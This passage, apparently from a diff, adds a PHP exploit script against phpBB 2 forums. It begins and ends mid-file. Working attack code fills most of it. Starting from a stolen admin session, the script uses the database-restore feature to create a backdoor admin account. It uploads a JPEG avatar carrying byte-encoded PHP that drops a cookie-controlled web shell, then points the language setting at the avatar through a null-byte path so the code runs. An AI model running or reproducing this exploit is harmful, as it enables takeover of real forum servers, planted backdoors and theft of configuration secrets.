+echo "php ".$argv[0]." localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 cat config.php\r\n";
+echo "php ".$argv[0]." localhost /phpbb/ 8db5cef976c7e0f51c25c92152b56881 ls -la -p81\r\n";
+echo "php ".$argv[0]." 
localhost / 8db5cef976c7e0f51c25c92152b56881 ls -la -P1.1.1.1:80\r\n\r\n";
+die;
+}
+
+/* explaination:
+
+ if you have admin session id, you can enable avatar uploads, if not activated
+ yet and you can store an arbitrary path for "default_lang" inside phpbb_config
+ database table using the "Database Restore" feature. So you can upload a
+ malicious avatar with php code as EXIF metadata content and submit a query like
+ this:
+
+ UPDATE phpbb_config SET config_value=CONCAT("english/../../images/avatars/297984465bc277af10.jpg",CHAR(0)) where config_name="default_lang";
+
+ note: you can see avatar filename in profile page
+
+ in faq.php, like in other files, near line 62, we have:
+
+ ...
+ include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/' . $lang_file . '.' . $phpEx);
+ ...
+
+ $board_config['default_lang'] var is not sanitized before to be used
+ to include files, so you can reach the malicious avatar to execute the code
+ inside of it.
+
+ This tool also creates a "suntzu" user with password "suntzu" and a backdoor
+ called suntzu.php, so you do not need sid after the first run
+ */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+ $result='';$exa='';$cont=0;
+ for ($i=0; $i<=strlen($string)-1; $i++)
+ {
+ if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+ {$result.=" .";}
+ else
+ {$result.=" ".$string[$i];}
+ if (strlen(dechex(ord($string[$i])))==2)
+ {$exa.=" ".dechex(ord($string[$i]));}
+ else
+ {$exa.=" 0".dechex(ord($string[$i]));}
+ $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+ }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+ global $proxy, $host, $port, $html, $proxy_regex;
+ if ($proxy=='') {
+ $ock=fsockopen(gethostbyname($host),$port);
+ if (!$ock) {
+ echo 'No response from '.$host.':'.$port; die;
+ }
+ }
+ else {
+ $c 
= preg_match($proxy_regex,$proxy);
+ if (!$c) {
+ echo 'Not a valid proxy...';die;
+ }
+ $parts=explode(':',$proxy);
+ echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+ $ock=fsockopen($parts[0],$parts[1]);
+ if (!$ock) {
+ echo 'No response from proxy...';die;
+ }
+ }
+ fputs($ock,$packet);
+ if ($proxy=='') {
+ $html='';
+ while (!feof($ock)) {
+ $html.=fgets($ock);
+ }
+ }
+ else {
+ $html='';
+ while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+ $html.=fread($ock,1);
+ }
+ }
+ fclose($ock);
+ #debug
+ #echo "\r\n".$html;
+
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+ $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+ $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... 
check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+
+
+echo "step 0 -> check if suntzu.php is already installed...\r\n";
+$packet ="GET ".$p."suntzu.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (strstr($html,"56789"))
+{
+ echo "Exploit succeeded...\r\n";
+ $temp=explode("56789",$html);
+ die("\r\n".$temp[1]."\r\n");
+}
+
+echo "Step 0b -> check if exploit has already succeeded but suntzu.php deleted, try to login as suntzu...\r\n";
+$data="username=suntzu";
+$data.="&password=suntzu";
+$data.="&redirect=".urlencode("admin/index.php?admin=1");
+$data.="&admin=1";
+$data.="&login=Log+in";
+$packet="POST ".$p."login.php HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."/login.php\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$temp2=explode(" ",$temp[3]);
+$cookie=$temp2[0];
+$temp2=explode(" ",$temp[4]);
+$cookie.=" ".$temp2[0];
+$temp=explode("admin=1&sid=",$html);
+$temp2=explode("\n",$temp[1]);
+$session_id=trim($temp2[0]);
+if (($cookie=='') | ($session_id=='')) {
+echo "step 0c -> query database to create a \"suntzu\" user with password \"suntzu\"...\r\n";
+$session_id=trim($argv[3]);
+//usually admin user_id is "2", so you need only session id... 
however, if you have admin cookie, specify it literally +$cookie="phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D; phpbb2mysql_sid="; +$cookie.=$session_id.";"; +$sql=" +# +# let's create a new admin user +# + +INSERT INTO phpbb_users(user_id,user_active,username,user_password,user_level,user_email) VALUES ('999999','1','suntzu','d33d57efba4c05808b5d16532f9d1567','1','suntzu\@fakemail.com'); + +"; + +$data='-----------------------------7d62702f250530 +Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql"; +Content-Type: text/plain + +'.$sql.' +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="perform" + +restore +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="restore_start" + +Start Restore +-----------------------------7d62702f250530-- +'; + +$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." HTTP/1.0\r\n"; +$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; +$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n"; +$packet.="Accept-Language: it\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n"; +$packet.="Cache-Control: no-cache\r\n"; +$packet.="Cookie: ".$cookie."\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +if (eregi("The Database has been successfully restored",$html)) +{ +echo "Done...\r\n"; +} +else +{ +die("Unable to modify table... 
maybe wrong admin sid\r\n"); +} +} +else +{ +echo "Cookie ->".$cookie."\r\n"; +echo "sid ->".urlencode($session_id)."\r\n\r\n"; +} + +echo "Step 1 -> Login as suntzu...\r\n"; +$data="username=suntzu"; +$data.="&password=suntzu"; +$data.="&redirect=".urlencode("admin/index.php?admin=1"); +$data.="&admin=1"; +$data.="&login=Log+in"; +$packet="POST ".$p."login.php HTTP/1.0\r\n"; +$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; +$packet.="Referer: http://".$host.$path."/login.php\r\n"; +$packet.="Accept-Language: it\r\n"; +$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n"; +$packet.="Cache-Control: no-cache\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +$temp=explode("Set-Cookie: ",$html); +$temp2=explode(" ",$temp[3]); +$cookie=$temp2[0]; +$temp2=explode(" ",$temp[4]); +$cookie.=" ".$temp2[0]; +echo "Cookie ->".$cookie."\r\n"; +$temp=explode("admin=1&sid=",$html); +$temp2=explode("\n",$temp[1]); +$session_id=trim($temp2[0]); +echo "sid ->".urlencode($session_id)."\r\n\r\n"; +if (($cookie=='') | ($session_id=='')) {die("Unable to login...");} + +echo "step 2 -> enable avatar uploads, if not enabled yet...\r\n"; +$data='-----------------------------7d62702f250530 +Content-Disposition: form-data; name="server_name" + +'.$host.' +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="server_port" + +'.$port.' +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="script_path" + +'.$path.' 
+-----------------------------7d62702f250530 +Content-Disposition: form-data; name="sitename" + +yourdomain.com +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="site_desc" + +A _little_ text to describe your forum +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="board_disable" + +0 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="require_activation" + +0 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="enable_confirm" + +0 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="allow_autologin" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="max_autologin_time" + +0 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="board_email_form" + +0 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="flood_interval" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="search_flood_interval" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="max_login_attempts" + +99 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="login_reset_time" + +30 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="topics_per_page" + +50 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="posts_per_page" + +15 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="hot_threshold" + +25 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="default_style" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="override_user_style" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="default_lang" + +english 
+-----------------------------7d62702f250530 +Content-Disposition: form-data; name="default_dateformat" + +D M d, Y g:i a +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="board_timezone" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="gzip_compress" + +0 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="prune_enable" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="cookie_domain" + + +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="cookie_name" + +phpbb2mysql +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="cookie_path" + +/ +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="cookie_secure"; + +0 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="session_length" + +3600 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="privmsg_disable" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="max_inbox_privmsgs" + +50 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="max_sentbox_privmsgs" + +25 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="max_savebox_privmsgs" + +50 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="max_poll_options" + +50 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="allow_html" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="allow_html_tags" + +b,i,u,pre +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="allow_bbcode" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="allow_smilies" + +1 +-----------------------------7d62702f250530 
+Content-Disposition: form-data; name="smilies_path" + +images/smiles +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="allow_sig" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="max_sig_chars" + +255 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="allow_namechange" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="allow_avatar_local" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="allow_avatar_remote" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="allow_avatar_upload" + +1 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="avatar_filesize" + +6144 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="avatar_max_height" + +100 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="avatar_max_width" + +100 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="avatar_path" + +images/avatars +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="avatar_gallery_path" + +images/avatars/gallery +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="coppa_fax" + + +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="coppa_mail" + + +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="board_email" + + +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="board_email_sig" + +Thanks, The Suntzu S.p.A. 
+-----------------------------7d62702f250530 +Content-Disposition: form-data; name="smtp_delivery" + +0 +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="smtp_host" + + +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="smtp_username" + + +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="smtp_password" + + +-----------------------------7d62702f250530 +Content-Disposition: form-data; name="submit" + +Submit +----------------------------7d62702f250530-- +'; + +$packet="POST ".$p."admin/admin_board.php?sid=".$session_id." HTTP/1.0\r\n"; +$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; +$packet.="Referer: http://".$host.$path."admin/admin_board.php?sid=".$session_id."\r\n"; +$packet.="Accept-Language: it\r\n"; +$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n"; +$packet.="Accept-Encoding: gzip, deflate\r\n"; +$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"; +$packet.="Host: ".$host."\r\n"; +$packet.="Content-Length: ".strlen($data)."\r\n"; +$packet.="Connection: Close\r\n"; +$packet.="Cache-Control: no-cache\r\n"; +$packet.="Cookie: ".$cookie."\r\n\r\n"; +$packet.=$data; +sendpacketii($packet); +if (eregi("Forum Configuration Updated Successfully",$html)) +{ +echo "Done...\r\n"; +} +else +{echo("Unable to modify configuration...");} + +echo "step 3 -> upload an avatar with php code as EXIF metadata content...\r\n"; +$avatar= +chr(0xff).chr(0xd8).chr(0xff).chr(0xfe).chr(0x01).chr(0x07).chr(0x3c).chr(0x3f). +chr(0x70).chr(0x68).chr(0x70).chr(0x0d).chr(0x0a).chr(0x24).chr(0x66).chr(0x70). +chr(0x3d).chr(0x66).chr(0x6f).chr(0x70).chr(0x65).chr(0x6e).chr(0x28).chr(0x22). +chr(0x73).chr(0x75).chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70). 
+chr(0x68).chr(0x70).chr(0x22).chr(0x2c).chr(0x22).chr(0x77).chr(0x22).chr(0x29). +chr(0x3b).chr(0x0d).chr(0x0a).chr(0x66).chr(0x70).chr(0x75).chr(0x74).chr(0x73). +chr(0x28).chr(0x24).chr(0x66).chr(0x70).chr(0x2c).chr(0x22).chr(0x3c).chr(0x3f). +chr(0x70).chr(0x68).chr(0x70).chr(0x20).chr(0x65).chr(0x72).chr(0x72).chr(0x6f). +chr(0x72).chr(0x5f).chr(0x72).chr(0x65).chr(0x70).chr(0x6f).chr(0x72).chr(0x74). +chr(0x69).chr(0x6e).chr(0x67).chr(0x28).chr(0x30).chr(0x29).chr(0x3b).chr(0x73). +chr(0x65).chr(0x74).chr(0x5f).chr(0x74).chr(0x69).chr(0x6d).chr(0x65).chr(0x5f). +chr(0x6c).chr(0x69).chr(0x6d).chr(0x69).chr(0x74).chr(0x28).chr(0x30).chr(0x29). +chr(0x3b).chr(0x69).chr(0x66).chr(0x20).chr(0x28).chr(0x67).chr(0x65).chr(0x74). +chr(0x5f).chr(0x6d).chr(0x61).chr(0x67).chr(0x69).chr(0x63).chr(0x5f).chr(0x71). +chr(0x75).chr(0x6f).chr(0x74).chr(0x65).chr(0x73).chr(0x5f).chr(0x67).chr(0x70). +chr(0x63).chr(0x28).chr(0x29).chr(0x29).chr(0x20).chr(0x7b).chr(0x5c).chr(0x24). +chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45).chr(0x5b). +chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x3d).chr(0x73).chr(0x74).chr(0x72). +chr(0x69).chr(0x70).chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65). +chr(0x73).chr(0x28).chr(0x5c).chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f). +chr(0x4b).chr(0x49).chr(0x45).chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d). +chr(0x29).chr(0x3b).chr(0x7d).chr(0x65).chr(0x63).chr(0x68).chr(0x6f).chr(0x20). +chr(0x35).chr(0x36).chr(0x37).chr(0x38).chr(0x39).chr(0x3b).chr(0x70).chr(0x61). +chr(0x73).chr(0x73).chr(0x74).chr(0x68).chr(0x72).chr(0x75).chr(0x28).chr(0x5c). +chr(0x24).chr(0x5f).chr(0x43).chr(0x4f).chr(0x4f).chr(0x4b).chr(0x49).chr(0x45). +chr(0x5b).chr(0x63).chr(0x6d).chr(0x64).chr(0x5d).chr(0x29).chr(0x3b).chr(0x65). +chr(0x63).chr(0x68).chr(0x6f).chr(0x20).chr(0x35).chr(0x36).chr(0x37).chr(0x38). +chr(0x39).chr(0x3b).chr(0x3f).chr(0x3e).chr(0x22).chr(0x29).chr(0x3b).chr(0x0d). 
+chr(0x0a).chr(0x66).chr(0x63).chr(0x6c).chr(0x6f).chr(0x73).chr(0x65).chr(0x28). +chr(0x24).chr(0x66).chr(0x70).chr(0x29).chr(0x3b).chr(0x0d).chr(0x0a).chr(0x63). +chr(0x68).chr(0x6d).chr(0x6f).chr(0x64).chr(0x28).chr(0x22).chr(0x73).chr(0x75). +chr(0x6e).chr(0x74).chr(0x7a).chr(0x75).chr(0x2e).chr(0x70).chr(0x68).chr(0x70). +chr(0x22).chr(0x2c).chr(0x37).chr(0x37).chr(0x37).chr(0x29).chr(0x3b).chr(0x0d). +chr(0x0a).chr(0x3f).chr(0x3e).chr(0xff).chr(0xe0).chr(0x00).chr(0x10).chr(0x4a). +chr(0x46).chr(0x49).chr(0x46).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x00). +chr(0x48).chr(0x00).chr(0x48).chr(0x00).chr(0x00).chr(0xff).chr(0xdb).chr(0x00). +chr(0x43).chr(0x00).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0xff).chr(0xdb).chr(0x00).chr(0x43).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). +chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01). 
+chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0x01).chr(0xff). +chr(0xc0).chr(0x00).chr(0x11).chr(0x08).chr(0x00).chr(0x01).chr(0x00).chr(0x01). +chr(0x03).chr(0x01).chr(0x11).chr(0x00).chr(0x02).chr(0x11).chr(0x01).chr(0x03). +chr(0x11).chr(0x01).chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x00).chr(0x01). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x08). +chr(0xff).chr(0xc4).chr(0x00).chr(0x14).chr(0x10).chr(0x01).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xc4). +chr(0x00).chr(0x15).chr(0x01).chr(0x01).chr(0x01).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x08).chr(0x09).chr(0xff).chr(0xc4).chr(0x00). +chr(0x14).chr(0x11).chr(0x01).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00). +chr(0x00).chr(0x00).chr(0x00).chr(0xff).chr(0xda).chr(0x00).chr(0x0c).chr(0x03). +chr(0x01).chr(0x00).chr(0x02).chr(0x11).chr(0x03).chr(0x11).chr(0x00).chr(0x3f). 
+chr(0x00).chr(0x23).chr(0x94).chr(0x09).chr(0x2e).chr(0xff).chr(0xd9).chr(0x00);
+
+/*
+this image has this code inside as EXIF metadata content
+<?php
+$fp=fopen("suntzu.php","w");
+fputs($fp,"<?php error_reporting(0);set_time_limit(0);if (get_magic_quotes_gpc()) {\$_COOKIE[cmd]=stripslashes(\$_COOKIE[cmd]);}echo 56789;passthru(\$_COOKIE[cmd]);echo 56789;?>");
+fclose($fp);
+chmod("suntzu.php",777);
+?>
+*/
+
+$data='-----------------------------7d62702f250530
+Content-Disposition: form-data; name="username"
+
+suntzu
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="email"
+
+suntzu@fakemail.com
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="cur_password"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="new_password"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="password_confirm"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="icq"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="aim"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="msn"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="yim"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="website"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="location"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="occupation"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="interests"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="signature"
+
+suntzu giving you the pain
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="viewemail"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="hideonline"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="notifyreply"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="notifypm"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="popup_pm"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="attachsig"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allowbbcode"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allowhtml"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="allowsmilies"
+
+1
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="language"
+
+italian
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="style"
+
+1047
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="timezone"
+
+2
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="dateformat"
+
+D M d, Y g:i a
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+100000
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatar"; filename="whatever.jpeg";
+Content-Type: image/pjpeg
+
+'.$avatar.'
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatarurl"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="avatarremoteurl"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="mode"
+
+editprofile
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="agreed"
+
+true
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="coppa"
+
+0
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="user_id"
+
+999999
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="current_email"
+
+
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="submit"
+
+Submit
+-----------------------------7d62702f250530--
+';
+
+$packet="POST ".$p."profile.php HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+sleep(1);
+
+echo "step 4 -> retrieve new filename for avatar from profile page...\r\n";
+$packet="GET ".$p."profile.php?mode=editprofile HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+$temp=explode("images/avatars/",$html);
+$temp2=explode("\"",$temp[1]);
+$avatar_name=$temp2[0];
+echo "avatar filename -> ".$avatar_name."\r\n";
+if ($avatar_name=='') {die("Unable to retrieve filename...");}
+
+echo "step 5 -> replace default_lang value in phpbb_config table with our path to shell, breaking path with a null char...\r\n";
+$sql='
+#
+# our path to avatar, using a null char to break the path
+#
+
+UPDATE phpbb_config SET config_value=CONCAT("english/../../images/avatars/'.$avatar_name.'",CHAR(0)) where config_name="default_lang";
+
+';
+
+$data='-----------------------------7d62702f250530
+Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql";
+Content-Type: text/plain
+
+'.$sql.'
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="perform"
+
+restore
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="restore_start"
+
+Start Restore
+-----------------------------7d62702f250530--
+';
+$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (eregi("The Database has been successfully restored",$html))
+{
+echo "Done...\r\n";
+}
+else
+{
+die("Unable to modify table...");
+}
+
+echo "step 6 -> execute code inside jpeg file\r\n";
